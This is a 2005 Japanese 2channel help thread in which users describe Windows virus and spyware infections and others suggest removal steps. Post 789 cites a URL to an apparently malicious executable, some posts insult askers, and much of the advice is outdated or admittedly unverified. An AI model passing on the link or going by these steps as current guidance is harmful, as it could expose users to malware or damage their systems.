742名無しさん@お腹いっぱい。:2005/06/03(金) 22:11:15
【使用OS】WinXP SP2
【WindowsUpdateしてるか】してます
【AntiVirusは何を使っているか】トレンドマイクロ ウイルスバスター2005
【ちゃんとUpdateしてるか】毎日してます
【スキャンした結果(ウイルス名・発見場所)】現在は感染してません
【別のオンラインスキャンしたならその結果は】感染してませんでした
【症状を具体的に、分かる限りすべて書く】
過去にAntinny.A&JやParite.Aなどにウイルス感染したことがあります。
改変されたレジストリを削除しようと思ってwin.iniで調べてみたのですが、
[ぬるぽ]
ぬるぽ=>>1 ガッ V`Д´)/
となっています。
通常なら感染しているファイルのパスが表示されるそうなのですが、
表示されていないためにレジストリを削除することができません。
これはウイルスを駆除できているということなのでしょうか?
【何をしたらそんなことになったのか】Winny
【これまでにとった措置】感染ファイル削除、ウイルススキャン、win.iniで確認
【その他の質問】
特定のスクリーンセーバーが設定しても無効化されてしまうということは
今もAntinnyに感染しているということなのでしょうか?
それとwin.iniの「ぬるぽ」を消す方法があれば教えてください。

よろしくお願いします。
743名無しさん@お腹いっぱい。:2005/06/03(金) 22:41:51
>>742
>>1の2行目を穴が開くほど良く読んでみろ
744742:2005/06/03(金) 23:09:17
>>743
読んだので先にスレを探しました。
でも専門スレが見つからなかったのでこちらに書かせてもらいました。
745名無しさん@お腹いっぱい。:2005/06/03(金) 23:10:36
OS ウインドウズ98
今価格コム覗いたんですが
大丈夫でしょうか。
シマンテック ノートンアンチウイルス2004を使用しています。
746名無しさん@お腹いっぱい。:2005/06/03(金) 23:14:29
>>744
ここでは満足いくレベルの回答は得られないと思うよ。
回答者も素人だし。
ぶっちゃけ、ny関連のウイルスって対応が判明していないのが多い。
アンチウイルス各社も後手後手の対応だしなぁ。
747名無しさん@お腹いっぱい。:2005/06/03(金) 23:25:17
【使用OS】
XP home
【WindowsUpdateしてるか】
月1ぐらいで
【AntiVirusは何を使っているか】
使っていません
【別のオンラインスキャンしたならその結果は】
スキャン中に何故か止まってしまいます。。
【症状を具体的に、分かる限りすべて書く】
USB接続のmp3プレイヤーを使っているのですが
ファイルを転送したあとmp3プレイヤーの中に
付録.txt     exeというファイルがコピーされています
【何をしたらそんなことになったのか】
直接の原因かは分かりませんがMP3CopyUtilというフリーソフトと
NET FrameWork1.1をインストールした後からこうなりました
ファイルをスキャンすべきだったのですが
気持ち悪くてすぐ削除してしまいました。すいません
748テイト:2005/06/03(金) 23:33:17
2ちゃんから別のサイトにジャンプしたら
(新シャア板 さすが○○は××のお家芸だなで1000を目指すスレ
の53番のレスです・・)

トロイの木馬に感染した旨のメッセージが出ました
マカフィーセキュリテイースイーツを
使っていたので削除し、ウイルススキャンしても
異常はありませんでした

その後gooなどで、オンラインウイルスチエックがあると聞き
ウイルスバスターとsymateckの2社のを利用したところ

ウイルスバスターではHTML_REDIR.Aに感染
symateckではUnix.Penguinに感染
との診断が・・・

後者は2ちゃん利用の誤検出かもしれませんが
前者のほうが気になります
どなたか削除の方法や対処法などご存知の方教えてください
749名無しさん@お腹いっぱい。:2005/06/03(金) 23:36:15
750テイト:2005/06/03(金) 23:44:26
>>749恐れ入ります
マカフィーではスキャンできず

トレンドマイクロ社とは契約していないので
削除ソフトは使えないのですが

こういう場合はどうしたらいいですか
751名無しさん@お腹いっぱい。:2005/06/03(金) 23:46:45
>>742
win.iniをメモ帳で開いて該当行をDeleteして上書き保存すればいいんじゃね?

つか、ここでも眺めとけ(質問禁止)
Winnyを狙ったワーム・ニュイルス情報 Part39
http://tmp5.2ch.net/test/read.cgi/download/1115476484/l50
752名無しさん@お腹いっぱい。:2005/06/03(金) 23:48:46
>>750
オンラインスキャンでどのファイルか表示されたでしょ?
その場所を覚えておいて、エクスプローラ等から普通に削除でOK。
インターネット一時ファイルから検出されたのなら、一時ファイルを削除すればOK。
753テイト:2005/06/04(土) 00:05:42
>>752
ツール→インターネットオプション→インターネット一時ファイル
→ファイルの削除
砂時計にて数分経過→OKクリック
でいいでしょうか?
いまからもう一度オンラインスキャンしてみます

ところでsymateckのオンラインスキャンの速度が
他社よりやたら遅いように感じたのですが・・
ほかのかたもそうなのですか?

754742:2005/06/04(土) 00:11:10
>>751
ありがとうございます!
さっそく今から読んできます。

>>746さんも、ありがとうございました!
755名無しさん@お腹いっぱい。:2005/06/04(土) 00:16:53
>>753
MS04-013充ててあるなら>752が言っている方法で桶。
砂時計にて数分ってなんだよ?普通(長くても)数秒だろ。
すべてのオフラインコンテンツを削除するにもチェックするよろし。
756名無しさん@お腹いっぱい。:2005/06/04(土) 02:25:15
>>733
具体的な情報や、
>「ルールDefault Block Bia Trojan horse」がxxx.xxx.xxx.xx、1042を遮断しました。」
などの情報を持ってシマンテックに問い合わせるのが吉。
ところでPFWは入れていないのか?
他からの不正通信(の疑いのあるもの)だと、FWに引っかかるが。
757756:2005/06/04(土) 02:27:33
PFWは、XP付属以外ということだぞ。
758テイト:2005/06/04(土) 12:05:43
>>752
インターネット一時ファイルを削除したもののまだウイルスが削除されて
ないみたいです
一晩いろいろ探したり調べてみたのですが
エクスプローラーからの削除とは、どこを操作すればいいでしょう?
検出されたファイルは
C\Document and settings (自分の名前) \local Settings \Temporary
Internet FIles \Content.IE5\s(ランダム英数字)¥exploit[数字]htm
です
759名無しさん@お腹いっぱい。:2005/06/04(土) 13:00:17
>>758
該当するフォルダがみつからない、というなら

すべてのファイルが表示されるようにエクスプローラの設定を変更する方法
ttp://service1.symantec.com/SUPPORT/INTER/tsgeninfojapanesekb.nsf/jp_docid/20021217004140953?OpenDocument&dtype=corp

エクスプローラの意味がわからないなら、マイコンピュータからフォルダ開いていけばいいべ。
760名無しさん@お腹いっぱい。:2005/06/04(土) 13:30:10
VBS/DDoS-iFrameNet
このトロイについての情報を教えていただけないでしょうか?
761名無しさん@お腹いっぱい。:2005/06/04(土) 13:32:17
762名無しさん@お腹いっぱい。:2005/06/04(土) 13:40:10
>>761
本当にすいません。ありがとうございます。
一度このような症状が出たのですぐPCを
強制終了させてシステムの復旧をさせたのですが、
またいつか勝手にこのような症状が出るのでしょうか?
無知すぎてすいません。
763名無しさん@お腹いっぱい。:2005/06/04(土) 13:48:49
はるばるVIPから笑いに来ました
764名無しさん@お腹いっぱい。:2005/06/04(土) 13:51:31
だから少しは自分で調べろって言ってんだろがボケ!

で、君はマカフィを使ってるのか?
発見された際に駆除されなかったか?
もう一度全検索して何も無かったら現時点での脅威はなくなったと言って間違いない

いつか勝手にと言うのは考えられない
自分で気付いてないだけで何らかの問題はあるものだ
ウイルス対策ソフトを常に最新にしてウインドウズアップデートは早めにしる
変なアドレスは踏むな正体不明のexeファイルを開くな
それで全てとは言わないが大幅に脅威を防ぐことができるだろう
765名無しさん@お腹いっぱい。:2005/06/04(土) 13:55:17
>>764
レス本当にありがとうございます。
そして死ぬほど怒られると思いますが、当方アンチウィルスソフトを
入れておりません。
ダッシュで買いに行きたいと思います。
厨全開な質問ですいませんでした。
766名無しさん@お腹いっぱい。:2005/06/04(土) 13:59:05
>>765
ばけやろう!
セキュ板に来る前にアンチウイルスくらい入れあがれ!

これを気にフリーでもいいから入れておけ
世界は悪意に満ちているのだよ
だれの為でなく自分を守るために最低限の対策はすべきだと思われ
767名無しさん@お腹いっぱい。:2005/06/04(土) 14:01:33
>>766
はい!なにかとりあえずぶっこんでおきたいと思います。
お手数おかけしました。
768テイト:2005/06/04(土) 15:40:41
>>759
ご指示どおり
全てのファイルを表示可能にしてから
windowsxp
Document and setting
自分のユーザー名
Local setting
temp
temporary Internet File
Content IE5
の順に開いていったのですが
その先のファイル \S10Z8FGV \exploit[1]htm
が見当たりませんでした
ウイルススキャンでメモった
時写し間違えたのかと思い
再度オンラインウイルススキャンかけたところ
何もウイルスが検出されませんでした・・・???

コレはウイルス削除・除去が完了したと
考えてよろしいんでしょうか

あとエクスプローラーの設定は既定値に戻したほうが
いいんでしょうか
お願いします
769名無しさん@お腹いっぱい。:2005/06/04(土) 16:52:39
>>768
>コレはウイルス削除・除去が完了したと
考えてよろしいかと。

>あとエクスプローラーの設定は既定値に
戻さないことを推奨。 
770テイト:2005/06/04(土) 17:01:14
>>769ありがとうございました

え?既定値に戻してしまいました
全ファイルを表示したほうが次回以後
作業が楽ということですか?

771名無しさん@お腹いっぱい。:2005/06/04(土) 17:07:04
           
           (・ω・`) 解析はまだか
    (´・ω・)  /   ⌒i   姉者。
    /   \     | |
    /    / ̄ ̄ ̄ ̄/ |
  __(__ニつ/  FMV  / .| .|____
      \/       / (u ⊃ 
772名無しさん@お腹いっぱい。:2005/06/04(土) 18:50:16
>>770
また同じコト聴きに来るつもりか (*´▽`)ハァーー
五月蝿せぇんだよ
面倒だから電話番号晒せ ドゾー( ´∀`)つ
773名無しさん@お腹いっぱい。:2005/06/04(土) 19:09:38
>>772
えーと0120-444-444ですぅ
774名無しさん@お腹いっぱい。:2005/06/04(土) 21:26:37
無料お試しサンプル貰いますた
775名無しさん@お腹いっぱい。:2005/06/04(土) 22:17:13
ドモホルンリンクルかよ(w
776名無しさん@お腹いっぱい。:2005/06/04(土) 23:11:30
【使用OS】 WinXP SP2
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 使ってませんでした。たまのオンラインスキャンですませてました。
【ちゃんとUpdateしてるか】 してませんでした
【スキャンした結果(ウイルス名・発見場所)】PE_PARITE.A、デスクトップ
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
パソコン起動してデスクトップ画面が表示されると固まってしまいます。
スタートバーもデスクトップのアイコンもどこもクリックできません。
【何をしたらそんなことになったのか】
寝ぼけてダブルクリックしてしまいましたorz
【これまでにとった措置】
特になし。
下手にいじって悪化したら困るのでネット喫茶から対処法お伺いにきました。
【その他の質問】
777名無しさん@お腹いっぱい。:2005/06/04(土) 23:26:25
>>776
>ですませてました。
つーか済んでねーだろ
778名無しさん@お腹いっぱい。:2005/06/04(土) 23:48:28
779名無しさん@お腹いっぱい。:2005/06/05(日) 00:40:44
downloader.trojanに感染してしまいました
シマンテックのHPにいってノートンで削除したんですが
時間がたつとdownloader.trojanが復活して増殖します
どーしたら良いでしょうか?
ちなみに最初、backdoor.fivsecにも感染したと出たのですがノートンで削除したらいなくなりました。

【OS】win XP
【WindowsUpdateしてるか】 してません
【AntiVirusは何を使っているか】ノートン corporateedition
【ちゃんとUpdateしてるか】 感染後に更新しました
【スキャンした結果(ウイルス名・発見場所)】 downloader.trojan  
【別のオンラインスキャンしたならその結果は】 イントラなのでネット切断してます
【症状を具体的に、分かる限りすべて書く】上記の症状の他に、シャットダウンじに「プログラムを終了しています」の表示が2〜3回表示されるようになりました
【何をしたらそんなことになったのか】 アンチ韓系の掲示板ひらいたら
【これまでにとった措置】 上記の通りです
【その他の質問】
780名無しさん@お腹いっぱい。:2005/06/05(日) 00:44:32
>>779
バカらしい
781779:2005/06/05(日) 00:47:42
すみません書き忘れました

ウィルスの検出場所はc:documents and settings\USR1\ です

よろしくお願いします
782名無しさん@お腹いっぱい。:2005/06/05(日) 01:20:52
>>777
orz申し訳ない
>>778
ありがとう。帰って試してみますね。
783名無しさん@お腹いっぱい。:2005/06/05(日) 02:42:28
携帯から失礼します。
あれこれしても解決出来ないので、助けて下さい…
AVGでTrojan horse Startpage.19.J
というのが見つかりますが、駆除ができません。
今、携帯しか頼る物がないので、調べるにも限界があります…
マイコンピュータのフォルダを開けようとすると、
まず「C:\WINDOW\TEMP\se.dllを読み込み中にエラーが発生しました。
アクセスが拒否されました。」
というメッセージが出て、直後にAVGが前記のウイルスを検出したとメッセージが出ます。
駆除の手順を知りたいです…もぅいっぱいいっぱいです。
784名無しさん@お腹いっぱい。:2005/06/05(日) 02:46:35
>>783
セーフモードで起動したらどうなる?
785783:2005/06/05(日) 02:57:50
セーフモードだとエラーは出ません。
しかしse.Dllもエラーがでて削除できません…
送り側のファイルが使用中の可能性があると出ます。
786名無しさん@お腹いっぱい。:2005/06/05(日) 03:03:44
>>783
どーやら悪質なスパイウェアみたいですね。
ttp://www.trojaner-info.de/anleitungen/hijackthis/about_blank.html
からSpSeHjfixを入手して、起動してみて。

マルウェア駆除後に再起動するので、セーフモードにして
もう一度SpSeHjfixを起動。
これでなんとかなるかも。

以上はググったものを書いてるだけなので、自己責任でやってみそ。
787名無しさん@お腹いっぱい。:2005/06/05(日) 03:04:40
海外のサイト見た限りだと、
Hijackthisを使って削除してるみたいだったけど、
ところでOSは何使ってるの?
788783:2005/06/05(日) 03:12:26
win Meです…(^o^;)
いろいろありがとうございます。
インターネットに接続も出来ない状態なので、知人経由で駆除ソフトを入手したいと思います。
本当に疲れました…ありがとうございます。
789Now_loading...324KB:2005/06/05(日) 16:25:51
むむむぅ。。。

【使用OS】
win xp
【WindowsUpdateしてるか】
頻繁
【AntiVirusは何を使っているか】
ノートン
【ちゃんとUpdateしてるか】
更新切れ
【スキャンした結果(ウイルス名・発見場所)】
反応せず
【別のオンラインスキャンしたならその結果は】
してません
【症状を具体的に、分かる限りすべて書く】
踏んだ途端、見知らぬ黒いnが出てきた
【何をしたらそんなことになったのか】
tp://private.freepage.de/bplischke/formatc.exe を踏みました
【これまでにとった措置】
ノートン検査のみ
【その他の質問】
有害ですか?駆除するにはどうすればよいですか?
790名無しさん@お腹いっぱい。:2005/06/05(日) 16:29:44
Adware.NeededWareとTrojan.StartPage.Mの対処方法を教えてください
シマンテックのHPに記載されていた方法を実行して削除してもすぐ復活してくるんです
791名無しさん@お腹いっぱい。:2005/06/05(日) 16:39:15
>>790
それらをインストールしている親玉さんがいる事を理解してください。
ソフトでは見つかりませんよ。
792名無しさん@お腹いっぱい。:2005/06/05(日) 16:45:09
環境記すの忘れてました・・・すみません

【使用OS】
windous Me
【WindowsUpdateしてるか】
稀に・・・
【AntiVirusは何を使っているか】
 ノートン
【ちゃんとUpdateしてるか】
 殆どしてません
【スキャンした結果(ウイルス名・発見場所)】
  Adware.NeededWareとTrojan.StartPage.M
【別のオンラインスキャンしたならその結果は】
 してません
【症状を具体的に、分かる限りすべて書く】
 削除してもすぐに復活
【何をしたらそんなことになったのか】
 不明
【これまでにとった措置】
 出来る限りのファイルの削除
 しかし一つだけ削除できず

てなところです
ちなみに感染したのは友人で僕は聞いてきてと頼まれただけなので・・・
793名無しさん@お腹いっぱい。:2005/06/05(日) 16:56:06
>>792は790です
794名無しさん@お腹いっぱい。:2005/06/05(日) 16:56:36
>>792
>ちなみに感染したのは友人で僕は聞いてきてと頼まれただけなので・・・

そんなの知りませんよ。にちゃんでは相手にされませんからね。勝手にしやがれ!
Meなら、レジストリ内のRun Runservice
それか、これらのファイル内にあるんじゃないの?
win.ini system.ini wininit.ini autoexec.bat
795名無しさん@お腹いっぱい。:2005/06/05(日) 20:32:24
ここは代理質問おkなのか
796名無しさん@お腹いっぱい。:2005/06/05(日) 21:36:11
>>738がスルーされてるので、どなたかお願いします。
797名無しさん@お腹いっぱい。:2005/06/05(日) 21:49:01
798名無しさん@お腹いっぱい。:2005/06/05(日) 21:58:04
799名無しさん@お腹いっぱい。:2005/06/06(月) 12:27:21
自分のメールアドレスから無差別にメールが送られてると言われました。
ウィルスバスターで探しても見つかりませんでした。

それでは対策の仕様が無いのでプロバイダーに接続してメールアカウントのパスワードを変更しました。Outlookのパスワードの設定は変えてないから今は自分のoutlookから接続できないようになってます。これで一応無差別にメールを送らなくできましたよね?
そもそもウィルスは何故自分のメールアカウントのパスワードを知っているのですか?やはりoutlookをつかってメールを出してるのですか?それともメールを出すだけならパスワードを知らなくても出せるのですか?
800名無しさん@お腹いっぱい。:2005/06/06(月) 12:39:05
【使用OS】 XP sp2
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ClamWin Antivirus
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 無し
【別のオンラインスキャンしたならその結果は】 無し

【何をしたらそんなことになったのか】
【これまでにとった措置】
【症状を具体的に、分かる限りすべて書く】
ダウンロードした怪しいファイルを間違ってダブルクリックしたとたん、一瞬でスタートアップなどにいくつか登録されたので確認した。
プログラムファイルにikenaiなんたらというフォルダが作成されており、中にexeファイルがあったため削除。スタートアップに登録されたそのexeファイルへのリンクも削除。
動作が重いのでドライブ容量を見ると、マイドキュメントの中身が全て消えており、妙な巨大ファイルがいくつか占領して、Cドライブを最小まで埋め尽くしていた。全て削除。マイドキュメントにはたいした物は入ってなかったので安堵。
ウイルススキャンをするが見つからず。
再起動しても何も起こらず安心していたのだが、とりあえずシステムの復元をしようと復元を起動。するとシステムの復元が全て無効になっており、有効にしようとすると
「1つ以上のドライブを有効または無効にしようとしたときにエラーが発生しました。コンピューターを再起動してください。」と出て有効にできない。
色々と検索してみるが詳細な解決方法が見つからずお手上げ状態です。
システムの復元機能を有効にしたいですし、またウイルス?ファイルを削除しただけのこの状態で安心できるのでしょうか?
801799:2005/06/06(月) 12:42:45
すいません。質問の形式が間違ってました。
【使用OS】 Windows2000 sp4
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ウィルスバスター
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 無し
【別のオンラインスキャンしたならその結果は】してません。

自分のメールアドレスから無差別にメールが送られてると言われました。
ウィルスバスターで探しても見つかりませんでした。

それでは対策の仕様が無いのでプロバイダーに接続してメールアカウントのパスワードを変更しました。Outlookのパスワードの設定は変えてないから今は自分のoutlookから接続できないようになってます。これで一応無差別にメールを送らなくできましたよね?
そもそもウィルスは何故自分のメールアカウントのパスワードを知っているのですか?やはりoutlookをつかってメールを出してるのですか?それともメールを出すだけならパスワードを知らなくても出せるのですか?

802名無しさん@お腹いっぱい。:2005/06/06(月) 13:01:33
>>801
まずはウイルスバスター開発元のトレンドマイクロとは別の会社のオンラインスキャンを行う。
それで感染していないことが確認できたならこういう事。

1.送信元メアドを詐称するウィルスは山ほどある。
  送っているのがあなただとは限らない。
2.あなたに警告してきた人は親切のつもりかも知れないが、1のようなウイルスがあることを知らない点で
  「余計なお世話」になってしまっている。
3.1のようなウィルスは自前でメールを送信する機能を持っている場合も多い。
  ウィルスがあなたのメールのパスワードを知っている必要はない。
  ウィルスに感染した時点で、感染したマシン自体がウィルスメールをばらまくための
  メールサーバーになってしまうと理解しておけばいい。
803名無しさん@お腹いっぱい。:2005/06/06(月) 13:03:03
>>799
無駄
ウイルスはメアド擬装するから
あんたのPCが感染してないんだったら、メアド登録してる誰かが感染してる

>>800
なんでもかんでもクリックするな
ここのテンプレ読んで全部やれ

エロサイト見たら…助けて下さい!Part55
http://pc8.2ch.net/test/read.cgi/pcqa/1117196310/
804799:2005/06/06(月) 13:23:04
>>802 >>803
どうもありがとうございます。
オンラインスキャンもして見ます。
805799,801:2005/06/06(月) 19:34:12
>>801で質問したものですがウィルスバスターでウィルスを見つけられずにいたので忠告どおりノートンのオンラインスキャンをしました。
その結果ウィルスが発見されたのですが
自分は2ch用ブラウザにLive2chを使っているのですがそのデータがウィルスに感染しているといわれました。
例としては
F:\Program Files\Live2ch\log\pc8.2ch.net\tech\1055075469.dat は VBS.LoveLetter.A に感染しています。
F:\Program Files\Live2ch\log\pc8.2ch.net\tech\1108280023.dat は Unix.Penguin に感染しています。
F:\Program Files\Live2ch\log\news19.2ch.net\newsplus\1114403664.dat は VBS.Freelink.B に感染しています。
F:\Program Files\Live2ch\log\live14.2ch.net\liveplus\1109799899.dat は Unix.Penguin に感染しています。
F:\Program Files\Live2ch\log\game10.2ch.net\ff\1099443899.dat は VBS.Network.E に感染しています。

前にノートン使ってる人は2ch見るときに誤反応があると聞いたのでその可能性もあるかと思いましたが、やはり感染してるのでしょうかね?
それとも誤反応の可能性もあるのでしょうか?
806名無しさん@お腹いっぱい。:2005/06/06(月) 19:38:06
>>805
誤検出。
807799,801:2005/06/06(月) 19:58:08
>>806
どうもありがとうございます。
安心しました。
808名無しさん@お腹いっぱい。:2005/06/06(月) 20:02:47
安心しましたって全然問題が解決してないじゃないか
809名無しさん@お腹いっぱい。:2005/06/06(月) 20:11:48
>>808
解決してるじゃん。
810800:2005/06/06(月) 20:20:47
>>803
ありがとうございます。
そちらのテンプレを一通りやってみましたが、怪しいサービスなどは削除できましたが、システムの復元のエラーだけは直りませんでした。
「1つ以上のドライブを有効または無効にしようとしたときにエラーが発生しました。コンピューターを再起動してください。」
という内容のエラーから解決する方法をご教授お願いします。
811名無しさん@お腹いっぱい。:2005/06/06(月) 20:29:46
>>810
全ドライブの復元を無効にしてから、System Volume Informationフォルダに
あんたのユーザーにフルコントロールのアクセス権を設定して削除
その後に再びシステムの復元を有効にすれば直る。
812800、810:2005/06/06(月) 20:54:39
>>811
ありがとうございます。
現在フルコントロールのアクセス権を与えるところで苦戦していますが、色々調べてやってみたいと思います。
全ドライブの復元を無効にしてからとありますが、このウイルスか何かで強制的に無効にさせられている状態のままでいいんですか?
813800、810、812:2005/06/06(月) 21:22:01
アクセス権限のことで調べていじっていたらSystem Volume Informationフォルダを開けるようになりましたが、
中身を消せばいいのですか?それともフォルダ自体を削除するのでしょうか?
フォルダは読み取り専用になっていて削除ができないのですが。
それともフルコントロールのアクセス権限というのをちゃんと設定すれば消せるのでしょうか・・・
814800、810、812、813:2005/06/06(月) 21:26:36
連続投稿すみません;
全ドライブのSystem Volume Informationフォルダを消すことができるようになりましたが、フォルダごと削除しても良い物なんでしょうか?
815名無しさん@お腹いっぱい。:2005/06/06(月) 21:38:57
>>814
フォルダごと削除して結構
システムの復元を有効にして再起動
816800、810、812、813、814:2005/06/06(月) 22:02:23
>>815
ありがとうございます。
フォルダごと削除しましたが、システムの復元の「全てのドライブで復元を無効にする」にチェックが入っているので、チェックをはずして適用を押すと、先ほどと同じく
「1つ以上のドライブを有効または無効にしようとしたときにエラーが発生しました。コンピューターを再起動してください。」
と表示されてしまいます。
とりあえず再起動して試しましたがダメでした。(再起動後にまたSystem Volume Informationを全部削除して試しても不可)
どうしたらよいものでしょうか;
817名無しさん@お腹いっぱい。:2005/06/06(月) 22:12:31
>>816
よく見たらあんた妙なexe踏んでるじゃないか。 吐くまでウイルススキャンしろよ
ttp://www.securityzone-za.bne.jp/virusscan.htm
818名無しさん@お腹いっぱい。:2005/06/06(月) 22:34:27
Winnyすれでスレ違いだという旨の指摘を受けたので、こちらでよいでしょうか?

【使用OS】WindowsXP
【WindowsUpdateしてるか】してません
【使用AntiVirusソフト】マカフィー
【AntiVirusをUpdateしてるか】してません

【症状、具体的に分かる限りすべて書く】
パソコンの中のmp3ファイルが全部イカレました
「メディアプレイヤーでいける種類の物ではありません」と出たので、
拡張子をtxtにして開いてみたら「ぬルポ」って書いてありました
【何をしたらそんなことになったのか】
友人から「これ聞け」っつってわたされたCDのなかのサントラのアーカイブファイルが原因だったのか・・・?
私のノパソはインターネットにつないでいないのでそれしかないと思う・・・
ソフトシンセ開いて再生してみたら、生音トラックも普通に再生できていたのでWAVファイルには影響ないのだと思う
1曲ためしにミックスダウンしてmp3ファイル作ってみたけど その出来たてmp3は普通に再生できます。。。
最悪の場合リカバリってもいいのですが、手軽に駆除するほう方はありませんか?
819名無しさん@お腹いっぱい。:2005/06/06(月) 22:43:37
>>818
Winny関連のウィルスは、Download板に専門スレッドがあります。
820名無しさん@お腹いっぱい。:2005/06/06(月) 22:49:56
>>818
スキャンした結果は?
オンラインスキャンとかでもやってみれば?
あとは友達に苦情を言うぐらいっすね。
821名無しさん@お腹いっぱい。:2005/06/06(月) 22:57:52
>>818
全部ファイルを切り刻まれているはずだから全部捨ててリカバリー ガハッ
822名無しさん@お腹いっぱい。:2005/06/06(月) 23:13:48
>>818
こっちに来るような話なら「板違い」って指摘されると思う
823名無しさん@お腹いっぱい。:2005/06/06(月) 23:16:47
昨日、OSを再インストールしたのですが
特定のフォルダを開こうとするとalg.exeがよくわからないサイトへftp接続しようとします。
明らかに何らかのウイルスにalg.exeが改ざんされているものと思われるのですが
alg.exeを装うウイルスが多くウイルスが特定できません。
さらにNorton2003では引っかかりません・・・・どぼしよう・・・どぼ
824名無しさん@お腹いっぱい。:2005/06/06(月) 23:23:37
>>823
オンラインスキャン試してみたらどうだ?
825名無しさん@お腹いっぱい。:2005/06/06(月) 23:27:26
avestを入れてみようと思っていたのですが
オンラインスキャンも試してみます。
どうもありがとう。

ちなみにftpで接続しようとしているIPは名前解決できないところでした・・・
存在しないと見たほうがよさそうです。
826823:2005/06/06(月) 23:48:00
avestでも見つけられず・・・オンラインスキャンを試してみます。
827名無しさん@お腹いっぱい。:2005/06/07(火) 00:49:22
>>818
【WindowsUpdateしてるか】してません
【AntiVirusをUpdateしてるか】してません

まずこれをやれ。
それくらいは思いつくだろうに・・・
828823:2005/06/07(火) 00:54:14
・・・・Norton
・・・・Avest
・・・・インターネットスキャン

全滅だ:・・・なぜウイルスが得てこないんだろう。
本当にウイルスじゃないのか?
829名無しさん@お腹いっぱい。:2005/06/07(火) 01:07:45
>>828
スパイウェアのチェックは?
830名無しさん@お腹いっぱい。:2005/06/07(火) 01:08:31
>>828
XPなら修復インストール。
以外なら再度入れなおし
831823:2005/06/07(火) 01:09:02
なんだか連続投稿で申し訳ないです・・・
どうもこのウイルスはftp.jaist.ac.jp(北陸先端科学技術大学院大学)にftp接続し
悪さをしようとしてみたいなんだけど・・・・う〜〜ん。
832名無しさん@お腹いっぱい。:2005/06/07(火) 01:10:59
昨日入れなおしたんならまた入れなおしても痛くは無いよな?
833823:2005/06/07(火) 01:11:15
>>829
それなんですが、インストールをまだしてないです。

>>830
OSは入れなおすつもりなんですが、自分が保存したデータ部分にウイルスがある可能性もあり
その部分は消したくないので今必死で探してるところです。
834823:2005/06/07(火) 01:12:23
>>832
ぜんぜん痛くないですねw
ていうか1ヶ月に一回ぐらいは入れなおしてます。入れなおした後のサクサク感がたまらなく良いんですよ。
835名無しさん@お腹いっぱい。:2005/06/07(火) 02:00:53
>>823
そのフォルダにftp.aist.ac.jpへのショートカットがあるだろ。
explorerがプレビューのためにアクセスしにいってる。
836名無しさん@お腹いっぱい。:2005/06/07(火) 02:05:46
ウイルス の検索結果のうち 日本語のページ 約 2,330,000
ウィルス の検索結果のうち 日本語のページ 約 2,710,000 件
837823:2005/06/07(火) 02:53:15
>>835
どうもそれに近いみたいです。
でも立ち上がるプロセス名がフォルダ内を見るたびにちがってて不可思議です。
とりあえず君が悪いので全部削除しました。
838名無しさん@お腹いっぱい:2005/06/07(火) 07:11:11
839名無しさん@お腹いっぱい。:2005/06/07(火) 11:23:38
ウイスキー の検索結果のうち 日本語のページ 約 1,470,000 件
ウィスキー の検索結果のうち 日本語のページ 約 1,470,000 件
840いけない保健室:2005/06/07(火) 21:24:25
すみません、質問させて下さい。
見るからに怪しげな実行ファイルを反射的にダブルクリックしてしまい、
「いけない保健室」っていうソフトがインスコされたんです。
Avastで感知され、削除されたハズだったのですが、症状が出ていました。
症状は確認した限りだと、Mydocumentに(゚∈゚*)***.jpgを作成、リブート後に
「システムがビジーです」の表示の無限増殖、システムの復元の無効です。
なんとかセーフモードから復旧させたのですが、システムの復元だけ有効に
することができないのです。(エラーが発生)
このウイルス名か、システムの復元を有効に戻せる方法を知っている方がおられましたら
どうか宜しくお願い致します。
同じ書き込みを「ウイルスに感染しました」スレにも書き込んですまいましたがお許し下さい・・・。

841840:2005/06/07(火) 23:00:02
よく読んだら上に全く同じ状況の方がいらっしゃいました・・・。
よく読まずにスレ汚し、本当にすみませんでした。
842名無しさん@お腹いっぱい。:2005/06/08(水) 23:57:43
【使用OS】 XP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 AVG
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】 何もなし
【別のオンラインスキャンしたならその結果は】 何もなし
【症状を具体的に、分かる限りすべて書く】 数日に1回、
何も扱っていないのに、フォルダなどをクリックした時の「カチャ」という音がする
IEなどのブラウザも起動せずマウスを扱っていないのに、クリックしただけがする。
【何をしたらそんなことになったのか】 不明。1ヵ月ほど前から。
【これまでにとった措置】 ウイルススキャン
【その他の質問】 
何かに感染しているか不明ですが、とても気味が悪いので、
原因がわかる方がいたら教えてください。
843名無しさん@お腹いっぱい。:2005/06/09(木) 00:08:01
【使用OS】XPpro
【WindowsUpdateしてるか】?
【AntiVirusは何を使っているか】2000
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】 なし
【別のオンラインスキャンしたならその結果は】 なし
【症状を具体的に、分かる限りすべて書く】 WinMoviePlugInという
ソフトがインスコされる。 www.archiviosex.netに接続を試みる
【何をしたらそんなことになったのか】 変なポップアップをまちがってクリックしてしまったみたいです
【これまでにとった措置】ウイルススキャン。adwareにてスキャン(セーフモード)
【その他の質問】

ウイルスに感染したのは今回がはじめてで意味ぷーなので助けてください。
844名無しさん@お腹いっぱい。:2005/06/09(木) 01:52:58
↑あほすぎて教えられません
一回しんで下さい
845名無しさん@お腹いっぱい。:2005/06/09(木) 01:54:08
たしかにこいつは一回しんだ方がいい
846名無しさん@お腹いっぱい。:2005/06/09(木) 01:56:33
>>842
それは当たり前の事
847名無しさん@お腹いっぱい。:2005/06/09(木) 01:58:14
>>843
【WindowsUpdateしてるか】?
→すぐにしなさい。やり方は[ツール→WindowsUpdate]ですぐできるから。
【AntiVirusは何を使っているか】2000
→「2000」じゃなんのソフトかわからん。
 とりあえずノートンの体験版でも落として入れてみる

復元ポイントを選んで復元するのも方法の1つ。
848名無しさん@お腹いっぱい。:2005/06/09(木) 02:01:16
>>840
意味不明ちゃんと提出しろ↓
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【これまでにとった措置】
【その他の質問】
